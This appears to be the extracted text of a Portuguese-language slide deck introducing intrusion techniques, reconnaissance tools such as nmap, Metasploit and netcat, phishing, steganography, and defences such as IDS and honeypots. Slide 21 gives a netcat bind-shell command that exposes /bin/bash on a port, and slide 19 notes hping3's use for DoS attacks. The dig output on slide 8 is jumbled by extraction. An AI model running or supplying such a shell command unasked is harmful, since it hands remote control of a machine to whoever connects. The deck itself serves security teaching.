3. Técnicas de invasão
• Engenharia social
• Brute Force
• Espionagem
• Segurança por obscuridade
4. Definindo um alvo
• Onde buscar informações?
• google
• myspace
• orkut
• google groups
5. Google
• Buscas específicas
• Utilizando recursos avançados do google
como
• as tags Intitle, Inurl, Intext
• Podem te trazer resultados muito
interessantes.
6. Engenharia social
Ferramentas úteis
• google • john the ripper
• dig • host
• nmap • hping3
• nessus • netcat
• Metasploit
• telnet
• sendip
7. Dig
• Uma ferramenta similar ou nslookup
porém mais flexível, pode ser utilizada
para fazer buscas como A,TXT, MX e NS.
8. dig +qr google.com any
• ;; ANSWER SECTION: NS ns3.google.com. ;; ADDITIONAL SECTION:
• google.com. 10186 IN • google.com. 318637 IN • smtp1.google.com. 2986
MX 10 NS ns4.google.com. IN A 72.14.203.25
smtp2.google.com. • ;; AUTHORITY SECTION: • smtp2.google.com. 2986
• google.com. 10186 IN • google.com. 318637 IN IN A 64.233.167.25
MX 10 NS ns2.google.com. • smtp3.google.com. 2986
smtp3.google.com. • google.com. 318637 IN IN A 64.233.183.25
• google.com. 10186 IN NS ns3.google.com. • smtp4.google.com. 2986
MX 10 • google.com. 318637 IN IN A 72.14.215.25
smtp4.google.com. NS ns4.google.com. • ns1.google.com. 345220
• google.com. 10186 IN • google.com. 318637 IN IN A 216.239.32.10
MX 10 NS ns1.google.com. • ns2.google.com. 345220
smtp1.google.com. IN A 216.239.34.10
• google.com. 318637 IN • ns3.google.com. 345219
NS ns1.google.com. IN A 216.239.36.10
• google.com. 318637 IN • ns4.google.com. 345219
NS ns2.google.com. IN A 216.239.38.10
• google.com. 318637 IN
10. Nmap
• é o mais famoso portscan existente hoje.
(www.insecure.org/nmap). É uma ótima
ferramenta, muito utilizado por hackers,
para descobrir falhas no sistema, em
portas abertas desnecessariamente.
11. Nessus
• O Nessus é uma ferramenta de auditoria
muito usada para detectar e corrigir
vulnerabilidades nos PCs da rede local
porem é muito utilizado por hackers para
descobrir a vulnerabilidade de um alvo.
13. Metasploit
• é um ambiente utilizado para escrever,
testar, e executa códigos de exploit. Foi
desenvolvido para prover penetração e
testes em computadores relacionados a
esse assunto, como também pesquisa de
vulnerabilidade.
• Metasploit
• Linha de comando
• Interface web
18. John The Ripper
Um programa usado para decifrar senhas
suportado nas plataformas UNIX, DOS,
WinNT?/Win95. É um programa disponível
gratuitamente desenvolvido para decifrar
senhas MD5, DES baseado na função
CRYPT.
19. hping3
• Mais uma ferramenta capaz de enviar
pacotes TCP, UDP e ICMP personalizados
e receber respostas como consegue em
icmp. Com ele você pode enviar arquivos
encapsulados e é util para ataques DoS.
20. netcat
• Programa para consultoria de redes muito
conhecido, isso deve-se ao fato de ele ser
um programa muito versátil, podendo
desde ser um simples telnet, portscan até
um sniffer.
21. netcat
• nc -l -e /bin/bash -p 1033
• A porta 1033 será colocada em listenning,
redirecionaremos a saída de dados para
um shell (/bin/bash). Assim quando
alguém se conectar a essa porta terá
domínio total sobre o computador.
23. Phishing
O que é phishing?
• Phishing é um tipo de fraude projetada
para roubar sua identidade. Em um
phishing scam, uma pessoa mal-
intencionada tenta obter informações
como números de cartões de crédito,
senhas, dados de contas ou outras
informações pessoais convencendo você
a fornecê-las sob pretextos enganosos.
24. Exemplos de Phishing
• Alguns sites famosos que permitem este
tipo de fake:
• google
• yahoo
• terra
31. Esteganografia
• Esteganografia basicamente é uma
técnica de esconder um arquivo dentro de
outro arquivo, podendo ser uma imagem ,
ou documento do Word até mesmo uma
planilha de excel e etc só que de uma
forma criptografada.
32. jp(hide an seek)
• O jphide e o jpseek são programas
utilizados para esconder mensagens em
arquivos JPEG.
39. Firewall
• Port Knock, uma solução leve e fácil de
configurar, permite que portas específicas
só sejam abertas no momento desejado
atraves de tentativas de conexão em
portas específicas.
40. *IDS
• NIDS – Network Intrusion Detection System
• HIDS - Host-based Intrusion Detection
System
• WIDS – Wireless Intrusion Detection System
• KIDS - Kernel Intrusion Detection System
41. Honeypot
• Útil para vigilância e alerta aos tipos de
ataques mais utilizados porem deve ser
utilizado com cuidado para que o invasor
não tenha acesso a rede real.
42. Antispam
• Indispensável para qualquer MX, útil para
evitar emails forjados e de domínios não
confiaveis, pode ser incrementado com
opções de RBL e CAPTCHA ("Completely
Automated Public Turing test to tell
Computers and Humans Apart").
43. Conclusão
• Com a popularidade do SL a informação
ficou mais acessível o que colaborou para
um maior avanço das técnicas de invasão,
em contra partida os sistemas de
segurança vem se tornando mais estáveis
a casa dia.